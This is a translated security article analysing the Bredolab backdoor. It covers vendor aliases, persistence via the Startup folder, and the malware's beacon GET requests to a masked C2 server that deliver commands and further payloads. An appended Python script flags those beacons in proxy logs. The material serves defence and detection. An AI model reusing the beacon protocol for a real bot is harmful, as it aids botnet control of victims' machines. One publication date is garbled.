Learn about Backdoor.Win32.Bredolab.eua malware

QuanTriMang.com - The term backdoor refers to malicious software created to install and distribute other malicious code on a user's computer. In terms of function and technique, a backdoor closely resembles a remote administration and management system. Such malicious applications are built to do whatever the attacker wants: send and receive data, launch, use and delete any file, display error messages, restart the computer automatically, and so on.

Programs of this kind are often used to link groups of infected computers into a botnet (zombie network). The people behind such a network can easily assemble a large number of computers, and this has become a standard tool for attackers carrying out their schemes.

Some backdoors are also able to spread and behave exactly like a Net-Worm. The two are distinguished by their ability to spread: a backdoor cannot replicate and spread on its own, in stark contrast to a Net-Worm. But on receiving a special command from the attackers, the backdoors will all spread at once and multiply in uncontrollable numbers.

In this article, we will discuss Backdoor.Win32.Bredolab.eua (the name given by Kaspersky), also known as:

- Trojan:Bredolab!N (McAfee)
- Mal/BredoPk-B (Sophos)
- Trj/Sinowal.DW (Panda)
- TrojanDownloader:Win32/Bredolab.AA (MS (OneCare))
- Trojan.Botnetlog.126 (DrWeb)
- Win32/TrojanDownloader.Bredolab.BE trojan (Nod32)
- Trojan.Downloader.Bredolab.EK (BitDef7)
- Backdoor.Bredolab.CNS (VirusBuster)
- Trojan.Win32.Bredolab (Ikarus)
- Cryptic.AGF (AVG)
- TR/Crypt.XPACK.Gen (AVIRA)
- W32/Bredolab.TP (Norman)
- Trojan.Win32.Generic.521C7EF8 (Rising)
- Backdoor.Win32.Bredolab.eua [AVP] (FSecure)
- Trojan-Downloader.Win32.Bredolab (Sunbelt)
- Backdoor.Bredolab.CNS (VirusBusterBeta)

It was first detected on June 3, 2010 at 16:16 GMT, the detection was released on 4/6/2010 at 3:28 GMT, and the detailed analysis was published on 12/12 7/2010 at 11:33 GMT.

Detailed technical description

In essence, malicious programs of this kind are controlled from a dedicated server and are responsible for downloading other malware onto the infected computer.

Like the other malicious programs in this family, it establishes persistence through the same autorun mechanism, copying its executable file to the Startup folder:

%Startup%\siszpe32.exe

and creates a file that looks like this:

%appdata%\avdrn.dat

As for the payload, the program connects to the server:

http:///*****lo.ru

where it sends the following request:

GET /new/controller.php?action=bot&entity_list=&uid=&first=1&guid=880941764&v=15&rnd=8520045

In response, the program receives commands and the code of other malicious applications to download; these are saved in the following location and run automatically:

%windir%\Temp.exe

It then sends further requests:

GET /new/controller.php?action=report&guid=0&rnd=8520045&guid=&entity=1260187840:unique_start;1260188029:unique_start;1260433697:unique_start;1260199741:unique_start

This data informs the server that the victim's computer has been infected.
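One defensive use of the request shapes described above is to flag them in web proxy logs. The following is an added example, not code from the original article: the log format (host, method, path) and the host names are constructed, and the C2 host is a placeholder because the article masks the real domain.

```python
import re
from urllib.parse import urlsplit

# Beacon shape described above: controller.php with action=bot (check-in)
# or action=report (infection report carrying <timestamp>:unique_start entries).
BEACON_PATH = "/new/controller.php"
BEACON_ACTIONS = {"bot", "report"}
ENTITY_RE = re.compile(r"^(\d+):(\w+)$")

def _parse_query(query):
    """Split a query string on '&' only, keeping blank and repeated keys (guid repeats)."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(key, []).append(value)
    return params

def parse_beacon(path):
    """Return a dict describing the Bredolab beacon in an HTTP request path, or None."""
    parts = urlsplit(path)
    if parts.path != BEACON_PATH:
        return None
    params = _parse_query(parts.query)
    action = params.get("action", [None])[0]
    if action not in BEACON_ACTIONS or "guid" not in params or "rnd" not in params:
        return None
    entities = []
    for item in params.get("entity", [""])[0].split(";"):   # ';' separates report entries
        m = ENTITY_RE.match(item.strip())
        if m:
            entities.append((int(m.group(1)), m.group(2)))
    return {"action": action, "guid": params["guid"], "rnd": params["rnd"][0], "entities": entities}

def scan_log(text):
    """Return (host, beacon) for each 'host method path' log line that matches the beacon."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue
        beacon = parse_beacon(fields[2])
        if beacon:
            hits.append((fields[0], beacon))
    return hits

# Constructed sample proxy log; c2.example.invalid stands in for the masked C2 domain.
SAMPLE_LOG = """\
www.example.invalid GET /index.html
c2.example.invalid GET /new/controller.php?action=bot&entity_list=&uid=&first=1&guid=880941764&v=15&rnd=8520045
c2.example.invalid GET /new/controller.php?action=report&guid=0&rnd=8520045&guid=&entity=1260187840:unique_start;1260188029:unique_start
www.example.invalid GET /new/controller.php?action=login
"""

if __name__ == "__main__":
    for host, beacon in scan_log(SAMPLE_LOG):
        print(host, beacon["action"], beacon["guid"], beacon["rnd"], beacon["entities"])
```

The report entries are unpacked into (timestamp, marker) pairs so a responder can correlate the reported times with host activity.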
